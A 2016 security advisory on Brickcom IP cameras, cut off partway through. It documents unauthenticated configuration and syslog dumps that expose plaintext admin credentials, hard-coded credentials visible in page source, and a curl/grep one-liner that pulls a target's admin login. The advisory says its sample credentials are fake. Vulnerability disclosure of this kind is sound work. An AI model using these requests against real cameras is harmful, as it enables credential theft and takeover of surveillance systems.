_ _ _ _ | | | | | | ___ _ ____ _____| | | | __ _| |__ ___ / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| | (_) | | \ V V / __/ | | | (_| | |_) \__ \ \___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ Security Adivisory 2016-04-12 www.orwelllabs.com twt:@orwelllabs sm1thw@0rw3lll4bs:~/bb# ./Bruce.S [+] surveillance is the business model of the internet - OK! sm1thw@0rw3lll4bs:~/bb# echo $? 6079 Adivisory Information ===================== Vendor: Brickcom Corporation CVE-Number:N/A Adivisory-URL: http://www.orwelllabs.com/2016/04/Brickcom-Multiple-Vulnerabilities.html OLSA-ID: OLSA-2015-12-12 Impact: High (especially because some of these products are used in critical environments.) Remote: Yes p4n0pt1c0n I. Insecure Direct Object Reference/Authentication Bypass II. Sensitive information in plaintext III. Hard-coded Credentials IV. Cross-site scripting V. Basic Authentication VI. Cross-site Request Forgery Background ---------- Brickcom (calls itself) as a "leading network video manufacturer in the IP surveillance industry. Dedicated to providing the best IP surveillance solutions with a solid foundation for engineering quality network video equipment with a Research and Development Department that has been producing wireless broadband networking equipment for over twenty years." These products are used as video surveillance system by costumers and important sectors such as the Thai 4ir F0rce, as can be seen on the Vendor's web site. * notes: - some firmwares affected (item 'affected products' are very recent, having been launched a few months ago, and still vulnerable ... so this is an structural/legacy problem. - sensitive information presented in this advisory are fake. I. Insecure Direct Object Reference/Authentication Bypass --------------------------------------------------------- (+) affected scripts - configfile.dump - syslog.dump Path: Maintenance -> Configuration -> 'Export' + configfile.dump An unauthenticated GET request to the script "configfile.dump", as follows: http://xxx.xxx.xxx.xxx/configfile.dump?action=get or like this http://xxx.xxx.xxx.xxx/configfile.dump.backup http://xxx.xxx.xxx.xxx/configfile.dump.gz or just http://xxx.xxx.xxx.xxx/configfile.dump returns all camera settings [..code_snip..] DeviceBasicInfo.firmwareVersion=v3.0.6.12 DeviceBasicInfo.macAddress=00:00:00:00:00:00 DeviceBasicInfo.sensorID=OV9X11 DeviceBasicInfo.internalName=Brickcom DeviceBasicInfo.productName=Di-1092AX DeviceBasicInfo.displayName=CB-1092AX DeviceBasicInfo.modelNumber=XXX DeviceBasicInfo.companyName=Brickcom Corporation DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM] DeviceBasicInfo.companyUrl=www.brickcom.com DeviceBasicInfo.serialNumber=AXNB02B211111 DeviceBasicInfo.skuType=LIT DeviceBasicInfo.ledIndicatorMode=1 DeviceBasicInfo.minorFW=1 DeviceBasicInfo.hardwareVersion= DeviceBasicInfo.PseudoPDseProdNum=P3301 AudioDeviceSetting.muted=0 [..code_snip..] and all credentials including the administrator account, like this: UserSetSetting.userList.size=2 UserSetSetting.userList.users0.index=0 UserSetSetting.userList.users0.password=MyM4st3rP4ss <<<--- admin pass UserSetSetting.userList.users0.privilege=1 UserSetSetting.userList.users0.username=Cam_User <<<--- admin user UserSetSetting.userList.users1.index=0 UserSetSetting.userList.users1.password=C0mm0mP4ss <<<--- (commom) user pass UserSetSetting.userList.users1.privilege=1 UserSetSetting.userList.users1.username=User_name <<<--- (commom) username UserSetSetting.userList.users2.index=0 UserSetSetting.userList.users2.password=[..code_snip..] [snip] BasicNetworkSetting.pppoe.password= <<<--- ppoe user BasicNetworkSetting.pppoe.username= <<<--- ppoe pass UPnPSetting.enabled=1 UPnPSetting.name=CB-102Ap-1ffc3 Brickcom.enabled=1 DDNSSetting.dyndnsEnabled=0 DDNSSetting.dyndns.wildcardEnabled=0 DDNSSetting.dyndns.username= <<<--- dyndns user DDNSSetting.dyndns.password= <<<--- dyndns password DDNSSetting.dyndns.hostname= DDNSSetting.tzodnsEnabled=0 DDNSSetting.tzodns.wildcardEnabled=0 DDNSSetting.tzodns.username= <<<--- and here... DDNSSetting.tzodns.password= <<<--- here.... DDNSSetting.tzodns.hostname= DDNSSetting.noipdnsEnabled=0 DDNSSetting.noipdns.wildcardEnabled=0 DDNSSetting.noipdns.username= <<<--- here DDNSSetting.noipdns.password= <<<--- here DDNSSetting.noipdns.hostname= and many others... - Path: System -> System Log -> 'Save to File' + syslog.dump - Request: (unauthenticated) GET http://xxx.xxx.xxx.xxx/syslog.dump?action=get - Response: [..code_snip..] LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1 21:13:36 2014 LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1 21:11:02 2014 [..code_snip..] Proof of Concept ````````````````` Online Bash exploit-p0c: curl -s -O http://xxx.xxx.xxx.xxx/configfile.dump && grep "users0" configfile.dump|awk '{ FS="."; } { print $4; }' || echo -e "[-] The target seems not be vulnerable, Mr. Robot! \n" IF target (xxx.xxx.xxx.xxx) is vulnerable the exploit will show a username, password and privilege level (1:admin), like this: password=4adm1niS3cr3tP4ss privilege=1 username=BrickcomADMIN and a configfile.dump with all credentials, settings, etc. will be recorded locally. IF not vulnerable, you'll see the message: "[-] The target seems not bet vulnerable, Mr. Robot!" II. sensitive information in plaintext -------------------------------------- As shown, there are countless cases where credentials and other sensitive information are store in plaintext. III. Hard-coded Credentials --------------------------- All credentials and other sensitive information can be found in html page user_management_config.html, Just viewing the html source code: view-source:http://{xxx.xxx.xxx.xxx}/user_management_config.html